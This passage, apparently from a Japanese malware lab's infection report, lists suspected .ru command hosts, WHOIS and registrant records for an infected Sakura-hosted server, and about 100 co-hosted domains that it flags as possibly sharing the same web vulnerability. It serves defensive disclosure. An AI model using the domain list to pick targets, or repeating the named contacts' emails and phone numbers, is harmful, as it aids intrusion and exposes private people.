   scanforsecurytyholes.ru 80 scanforsecurytyholes.ru scanforsecurytyholes.ru
   testnosecurity.ru 80 testnosecurity.ru testnosecurity.ru
   securytycheckme.ru 80 securytycheckme.ru securytycheckme.ru
   krjjfgzzzooooem.ru 80 krjjfgzzzooooem.ru krjjfgzzzooooem.ru
9. ネットワーク接続証拠↓
   SYNシグナルを送る時に↓
   
   接続が出来た時に↓
   
■感染されたサーバ情報（感染可能性＆手続きについて）
感染されたサーバのIP登録情報は↓
inetnum:        59.106.157.192 - 59.106.157.223
netname:        NETGROOVE
descr:         Netgroove works co.,ltd.
country:        JP
admin-c: HT4558JP
tech-c:         HT4558JP
a. [JPNICハンドル]              HT4558JP
b. [氏名]                       徳田 秀寿
c. [Last, First]                Tokuda, Hidetoshi
d. [電子メイル]                 tokuda@netgroove.ne.jp
f. [組織名]                     有限会社ネットグルーヴワークス
g. [Organization]               Netgroove works co.,ltd.
上のネットワークは↓

inetnum:        59.106.0.0 - 59.106.255.255
netname:        SAKURA
descr:          SAKURA Internet Inc.
descr:          1-8-14, Minami Honmachi, Chuo-ku, Osaka 541-0054, Japan
country:        JP
admin-c:        JNIC1-AP
tech-c:         JNIC1-AP

インターネットルーティング図↓
ドメイン登録内容は↓
Domain Name: nexe-japan.com
Created On: 2010-10-20 14:27:00.0
Last Updated On: 2011-10-05 07:09:59.0
Expiration Date: 2012-10-20 14:27:00.0
Status: ACTIVE
Registrant Name: nexe japan
Registrant Organization: nexe-japan
Registrant Street1: 1-1-18 Toranomon
Registrant Street2: 
Registrant City: Minato-ku
Registrant State: Tokyo
Registrant Postal Code: 1050001
Registrant Country: JP
Registrant Phone: 81-8020307502
Registrant Fax: 
Registrant Email: fartisan@nexe-japan.com
■感染可能性について

59.106.157.194のAレコードにウェブサービスが沢山あります、計算したら100個ドメインです。
恐らくホスティングのお客様ですね。同じ感染が出る可能性が高いです。
何故か高いかというと、感染の原因はウェブサービスの脆弱性かと思われます。
であればその他ドメインにも同じウェブ脆弱性が持っていたら大問題です。

念のためにドメインの情報を洗い出しました。下記となります↓
abraxasensemble.co.uk a  59.106.157.194
aimehouse.com a  59.106.157.194
blackboard-sale.com a  59.106.157.194
brucebabcock.com a  59.106.157.194
bsoldsoon.com a  59.106.157.194
c21youngblood.com a  59.106.157.194
cats-bengal.com a  59.106.157.194
cbbutzer.com a  59.106.157.194
christopherrunbluegrass.com a  59.106.157.194
daviejunction.com a  59.106.157.194
dianewms.com a  59.106.157.194
germa-titan.com a  59.106.157.194
hairsnares.com a  59.106.157.194
hajiri.com a  59.106.157.194
handyawards.com a  59.106.157.194
hanekisengakuin.com a  59.106.157.194
helidream.com a  59.106.157.194
herfirstanalhardcore.com a  59.106.157.194
highdesertaz.com a  59.106.157.194
hilaryspero.com a  59.106.157.194
himakuro.net a  59.106.157.194
info-jp.info a  59.106.157.194
jotesa.com a  59.106.157.194
kaligrafik.net a  59.106.157.194
kapdb.org a  59.106.157.194
katuun.net a  59.106.157.194
kellokuul.com a  59.106.157.194
liveustv.com a  59.106.157.194
lynnpowellrealty.com a  59.106.157.194
madamreverend.com a  59.106.157.194
mail.aimehouse.com a  59.106.157.194
mail.australian-escort.com a  59.106.157.194
mail.bigjons.com a  59.106.157.194
mail.blackboard-sale.com a  59.106.157.194
mail.brucebabcock.com a  59.106.157.194
mail.bsoldsoon.com a  59.106.157.194
mail.c21youngblood.com a  59.106.157.194
mail.cbbutzer.com a  59.106.157.194
mail.christopherrunbluegrass.com a  59.106.157.194
mail.daviejunction.com a  59.106.157.194
mail.dianewms.com a  59.106.157.194
mail.gingkotrio.com a  59.106.157.194
mail.handyawards.com a  59.106.157.194
mail.hanekisengakuin.com a  59.106.157.194
mail.hilaryspero.com a  59.106.157.194
mail.himakuro.net a  59.106.157.194
mail.lynnpowellrealty.com a  59.106.157.194
mail.margehusk.com a  59.106.157.194
mail.minamata-ds.com a  59.106.157.194
mail.naplesgolfcoursehomes.com a  59.106.157.194
mail.nashvilleapartmentsforrent.com a  59.106.157.194
mail.nicensweet.com a  59.106.157.194
mail.rapturous.info a  59.106.157.194
mail.rekaijohnson.com a  59.106.157.194
mail.robinson-polhemus.com a  59.106.157.194
mail.rollarealtor.com a  59.106.157.194
mail.suntechindustriesinc.com a  59.106.157.194
mail.wcflyway.com a  59.106.157.194
mail.worldzonesupport.com a  59.106.157.194
mail.xn--ekr4mi9xmia.net a  59.106.157.194
mail.xn--gmq53hni700alidm42afir8k1b.net a  59.106.157.194
mail.xn--ncke2h5c6az020cug8d.net a  59.106.157.194
mail.yettiband.com a  59.106.157.194
margehusk.com a  59.106.157.194
mcboobs.com a  59.106.157.194
merriemonarchlive.com a  59.106.157.194
minamata-ds.com a  59.106.157.194
mnjb.org a  59.106.157.194
msl.ne.jp a  59.106.157.194
mysticrivertoysandgifts.com a  59.106.157.194
naplesgolfcoursehomes.com a  59.106.157.194
nashvilleapartmentsforrent.com a  59.106.157.194
nicensweet.com a  59.106.157.194
nobilenet.com a  59.106.157.194
ohmybuin.com a  59.106.157.194
oicmiz.com a  59.106.157.194
pokerroomcombonuscode.info a  59.106.157.194
prudwitesrealty.com a  59.106.157.194
qnrwater.com a  59.106.157.194
rabernet.com a  59.106.157.194
rapturous.info a  59.106.157.194
rencontre-du-net.com a  59.106.157.194
rina-love.com a  59.106.157.194
shadowsradio.com a  59.106.157.194
suntechindustriesinc.com a  59.106.157.194
tatweri.com a  59.106.157.194
teen-tonic.net a  59.106.157.194
watch-umeda.com a  59.106.157.194
watchesmonster.com a  59.106.157.194
wcflyway.com a  59.106.157.194
worldzonesupport.com a  59.106.157.194
www.rabernet.com a  59.106.157.194
www.shadowsradio.com a  59.106.157.194
xn--ekr4mi9xmia.net a  59.106.157.194
xn--gmq53hni700alidm42afir8k1b.net a  59.106.157.194
xn--n8j482gnja71hcz2b.net a  59.106.157.194
xn--ncke2h5c6az020cug8d.net a  59.106.157.194
xn--u9jthzau9b8d9bgg9b7b4787e.net a  59.106.157.194
yettiband.com a  59.106.157.194
youxi333.com a  59.106.157.194
【注意】もし上記のドメインウェブサーバが同じ脆弱性が持ってたら感染可能性が高いです！

■感染可能性：周りドメインのグラフ情報↓

----
ゼロデイ・ジャパン http://0day.jp
マルウェア研究所
Analyst: アドリアン・ヘンドリック / Hendrik ADRIAN
Sponsored by: 株式会社ケイエルジェイテック
Tweet

TO BE NOTICED: All of the findings and exposed material in this site is belong to the site owner and is an original
materials. Any COPY of research material without written permission from unixfreaxjp/site owner is strictly prohibited. Any attempt to camouflage and attempt to owning this research material will be prosecuted by law.